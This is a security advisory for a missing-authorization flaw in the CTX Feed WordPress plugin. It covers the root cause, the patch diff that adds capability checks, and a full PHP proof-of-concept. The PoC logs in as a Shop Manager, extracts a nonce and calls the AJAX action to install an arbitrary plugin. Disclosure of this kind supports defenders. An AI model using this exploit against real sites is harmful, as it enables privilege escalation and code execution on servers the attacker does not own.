Atomic Edge analysis of CVE-2025-12975:
This vulnerability is a missing authorization flaw in the CTX Feed WordPress plugin, allowing authenticated attackers with Shop Manager privileges or higher to install arbitrary plugins. The vulnerability resides in the plugin’s AJAX handler function for plugin installation, enabling privilege escalation and potential remote code execution.
Atomic Edge research identified the root cause as a missing capability check in the `woo_feed_plugin_installing()` function within `/includes/helper.php`. The vulnerable function, beginning at line 6223, performed only a nonce verification via `check_ajax_referer()` but lacked any user authorization validation. This allowed any authenticated user with access to the AJAX endpoint to trigger the plugin installation routine, regardless of their actual permissions. The function directly passed user-controlled input from `$_POST[‘data’]` to the `woo_feed_install_and_activate_plugin()` function.
Exploitation requires an authenticated attacker with Shop Manager or higher privileges to send a crafted POST request to `/wp-admin/admin-ajax.php` with the action parameter set to `woo_feed_plugin_installing`. The attacker must include a valid nonce from the `woo-feed-our-plugins-nonce` context and specify the target plugin slug in the `data` parameter. The plugin slug can reference any WordPress.org repository plugin or a malicious plugin, which the vulnerable function will download, install, and activate automatically.
The patch adds capability checks at two critical points. In `woo_feed_plugin_installing()` at line 6229, the patch inserts `if ( ! current_user_can( ‘manage_options’ ) )` to verify administrator privileges before processing. If the check fails, the function returns a 401 Unauthorized JSON response. A secondary check was also added to `woo_feed_install_and_activate_plugin()` at line 6275, providing defense in depth. These changes restrict plugin installation exclusively to users with the `manage_options` capability, effectively removing the Shop Manager role from the authorized user set.
Successful exploitation grants attackers the ability to install and activate arbitrary WordPress plugins. This directly enables privilege escalation by installing plugins that provide administrative capabilities or backdoor access. The most severe impact is remote code execution, achieved by installing a malicious plugin containing PHP code or by leveraging the capabilities of legitimate plugins to execute system commands, modify files, or establish persistent access. Attackers could compromise the entire WordPress installation and underlying server.
--- a/webappick-product-feed-for-woocommerce/V5/Product/ProductAttributeFactory.php
+++ b/webappick-product-feed-for-woocommerce/V5/Product/ProductAttributeFactory.php
@@ -47,6 +47,7 @@
'title' => esc_html__( 'Product Title', 'woo-feed' ),
'parent_title' => esc_html__( 'Parent Title', 'woo-feed' ),
'description' => esc_html__( 'Product Description', 'woo-feed' ),
+ 'parent_description' => esc_html__( 'Parent Description', 'woo-feed' ),
'description_with_html' => esc_html__( 'Product Description (with HTML)', 'woo-feed' ),
'short_description' => esc_html__( 'Product Short Description', 'woo-feed' ),
'primary_category' => esc_html__( 'Parent Category', 'woo-feed' ),
--- a/webappick-product-feed-for-woocommerce/V5/Product/ProductInfo.php
+++ b/webappick-product-feed-for-woocommerce/V5/Product/ProductInfo.php
@@ -183,6 +183,22 @@
}
/**
+ * Get product parent description.
+ *
+ * @return string
+ * @since 8.0.0
+ */
+ public function parent_description() {
+ if ( $this->product->is_type( 'variation' ) && $this->parent_product ) {
+ $description = CommonHelper::clean_content( $this->parent_product->get_description() );
+ } else {
+ $description = $this->description();
+ }
+
+ return apply_filters( 'woo_feed_filter_product_parent_description', $description, $this->product, $this->config, $this->parent_product );
+ }
+
+ /**
* Get product description with HTML.
*
* @return string
--- a/webappick-product-feed-for-woocommerce/includes/classes/class-woo-feed-constants.php
+++ b/webappick-product-feed-for-woocommerce/includes/classes/class-woo-feed-constants.php
@@ -24,7 +24,7 @@
* @since 3.1.6
*/
- define( 'WOO_FEED_FREE_VERSION', '6.6.11' );
+ define( 'WOO_FEED_FREE_VERSION', '6.6.12' );
}
--- a/webappick-product-feed-for-woocommerce/includes/helper.php
+++ b/webappick-product-feed-for-woocommerce/includes/helper.php
@@ -6223,21 +6223,41 @@
}
if ( ! function_exists( 'woo_feed_plugin_installing' ) ) {
- function woo_feed_plugin_installing() {
+ function woo_feed_plugin_installing()
+ {
// Handle AJAX request here
// For example, get data from request
- check_ajax_referer( 'woo-feed-our-plugins-nonce', 'nonce' );
+ check_ajax_referer('woo-feed-our-plugins-nonce', 'nonce');
+
+ if ( ! current_user_can( 'manage_options' ) ) {
+ $response = array(
+ 'status' => 401,
+ 'result' => 'Unauthorized'
+ );
+ // Send JSON response
+ wp_send_json($response);
+
+ // Don't forget to exit
+ wp_die();
+ }
- $plugin_slug = isset( $_POST['data'] ) ? sanitize_text_field( $_POST['data'] ) : '';
+ $plugin_slug = isset($_POST['data']) ? sanitize_text_field($_POST['data']) : '';
$result = woo_feed_install_and_activate_plugin($plugin_slug);
// Process data
// Example response
- $response = array(
- 'status' => 200,
- 'result' => $result
- );
+ if ($result == 'failed') {
+ $response = array(
+ 'status' => 403,
+ 'result' => $result
+ );
+ } else {
+ $response = array(
+ 'status' => 200,
+ 'result' => $result
+ );
+ }
// Send JSON response
wp_send_json($response);
@@ -6252,6 +6272,11 @@
if ( ! function_exists( 'woo_feed_install_and_activate_plugin' ) ) {
function woo_feed_install_and_activate_plugin($plugin_slug)
{
+
+ if ( ! current_user_can( 'manage_options' ) ) {
+ return "failed";
+ }
+
// Include necessary WordPress files
require_once ABSPATH . 'wp-admin/includes/plugin.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
--- a/webappick-product-feed-for-woocommerce/woo-feed.php
+++ b/webappick-product-feed-for-woocommerce/woo-feed.php
@@ -10,7 +10,7 @@
* Plugin Name: CTX Feed
* Plugin URI: https://webappick.com/
* Description: Easily generate woocommerce product feed for any marketing channel like Google Shopping(Merchant), Facebook Remarketing, Bing, eBay & more. Support 100+ Merchants.
- * Version: 6.6.11
+ * Version: 6.6.12
* Author: WebAppick
* Author URI: https://webappick.com/
* License: GPL v2
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12975 - CTX Feed – WooCommerce Product Feed Manager <= 6.6.11 - Missing Authorization to Authenticated (Shop Manager+) Arbitrary Plugin Installation
<?php
$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'shop_manager';
$password = 'password123';
$plugin_slug = 'malicious-plugin'; // Slug of plugin to install from WordPress.org repository
// Step 1: Authenticate and obtain cookies
$login_url = str_replace('/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url,
'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
// Step 2: Visit plugin page to obtain nonce (required for AJAX request)
// The nonce is typically loaded on plugin admin pages
$plugin_admin_url = str_replace('/admin-ajax.php', '/admin.php?page=webappick-feed-settings', $target_url);
curl_setopt($ch, CURLOPT_URL, $plugin_admin_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);
// Extract nonce from page (this is simplified - actual implementation needs DOM parsing)
// Nonce is typically in a script tag or data attribute with name 'woo-feed-our-plugins-nonce'
preg_match('/woo-feed-our-plugins-nonce['"]+([a-f0-9]+)/', $response, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
die('Could not extract nonce. Attack may require visiting specific plugin page first.');
}
// Step 3: Exploit the vulnerability to install arbitrary plugin
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'action' => 'woo_feed_plugin_installing',
'nonce' => $nonce,
'data' => $plugin_slug
]));
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
curl_close($ch);
// Step 4: Analyze response
echo "Response: " . htmlspecialchars($response) . "n";
$json = json_decode($response, true);
if ($json && $json['status'] == 200) {
echo "SUCCESS: Plugin '$plugin_slug' installed and activated.n";
} else {
echo "FAILED: Plugin installation failed.n";
}
?>
